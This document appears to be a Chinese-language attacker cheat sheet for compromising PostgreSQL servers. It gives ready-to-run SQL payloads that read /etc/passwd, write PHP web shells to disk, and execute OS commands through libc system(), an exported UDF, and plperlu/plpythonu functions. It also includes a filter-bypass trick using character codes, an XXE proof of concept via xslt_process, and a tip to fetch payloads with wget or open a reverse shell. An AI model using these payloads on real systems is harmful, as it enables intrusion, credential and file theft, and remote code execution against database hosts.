方法1.
适用于可以多语句执行时
读取

  CREATE TABLE read(t TEXT); COPY read FROM '/etc/passwd'; SELECT * FROM read limit 1 offset 0; drop table read;

写出

  CREATE TABLE shell(t TEXT); INSERT INTO shell(t) VALUES ('shel text'); COPY shell(t) TO '/www/shell.php';

方法2.
适用于不能多语句执行,且当前用户为超级用户
读取

select lo_import('/etc/passwd',88888);//输入系统文件到大对象,指定oid为88888 select array_agg(b) from (select encode(data,'hex')b,pageno from pg_largeobject where loid=88888 order by pageno)a;//取出数据的hex编码,自己复制本地转换 select lo_unlink(88888);//删除loid为88888的大对象

写出

select lo_create(88888);//创建loid为88888空的大对象 select lowrite(lo_open(88888,131072),decode('272829','hex'));//inv_write(写,值为131072) inv_read(读,值为262144) inv_write|inv_read (读写,值为393216),272829为想写入文件的hex值(前面无0X) select lo_export(88888,'/tmp/shell.php');//写出shell select lo_unlink(88888);

大对象详情

https://doc.zzbaike.com/PostgreSQL/8-1/pgsqldoc-cvs/lo-interfaces.html

/database/201309/241947.html

2.命令执行

1.内置libc库的system()函数,8.1版本后不能动态加载

  CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT; select system('id');

2.udf导出(使用大对象导出)

insert into pg_largeobject (loid,pageno,data) values(loid, 0, decode('', 'hex'));//插入pg对应版本udf的hex值,其中loid为int型数值尽量取大些如999999 select lo_export(999999,'/tmp/sys.so');导出udf文件 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;//创建sys_eval函数 select sys_eval('id');可以执行命令了

pg导出udf工具 需要可以外联,知道帐号密码

https://pan.baidu.com/share/link?shareid=2228793351&uk=1898022059

(其中里面的py脚本里有8.3-9.0版本udf hex值)
3.使用第三方语言如perl/python(需要目标存在第三方库)
1.perl

  SELECT count(*) FROM pg_language WHERE lanname='plperlu';//查询是否创建plperlu,安装了返回1,没有返回0 CREATE LANGUAGE plperlu;//为0的话可以尝试添加 CREATE FUNCTION proxyshell(text) RETURNS text AS 'open(FD,"$_[0] |");return join("",);' LANGUAGE plperlu;//创建perl函数 select proxyshell('id');//执行命令

2.python(同上)

  SELECT count(*) FROM pg_language WHERE lanname='plpythonu'; CREATE LANGUAGE plpythonu; CREATE FUNCTION proxyshell(text) RETURNS text AS 'import os; return os.popen(args[0]).read() 'LANGUAGE plpythonu; select proxyshell('id');

tips:
1.回显命令可以把结果插进表中

create table test(id serial,out text); insert into test(out) values(proxyshell('ls /tmp')); select out from test where id=1;

2.更加方便的可以直接wget,反弹shell
3.创建函数时字符被过滤,可以这样

  CREATE FUNCTION sys() RETURNS text AS $p$open(FD,chr(105).chr(100).chr(32).chr(124));return join(0,);$p$ LANGUAGE plperlu; //命令直接写入函数,char(105),char(100)为id命令,其他命令转为ascii编码写入 select sys();//执行命令 drop function sys();//删除函数,写入下个命令

3.基于错误XML漏洞
poc:

SELECT xslt_process('<!DOCTYPE employee [<!ENTITY asd SYSTEM "/etc/passwd">] ><employee><name>&asd;</name><age>30</age><pay>400</pay></employee>'::text, $$<xsl:stylesheet xmlns:xsl="https://www.w3.org/1999/XSL/Transform" version="1.0"><xsl:template match="*"> <xsl:element name="samples"> <xsl:element name="sample"><xsl:value-of select="//employee/name/text()"/> </xsl:element> </xsl:element></xsl:template></xsl:stylesheet>$$::text, 'n1=v1,n2=v2,n3=v3,n4=v4,n5=v5'::text);




更多详情

/Article/201111/109868.html

https://lab.onsec.ru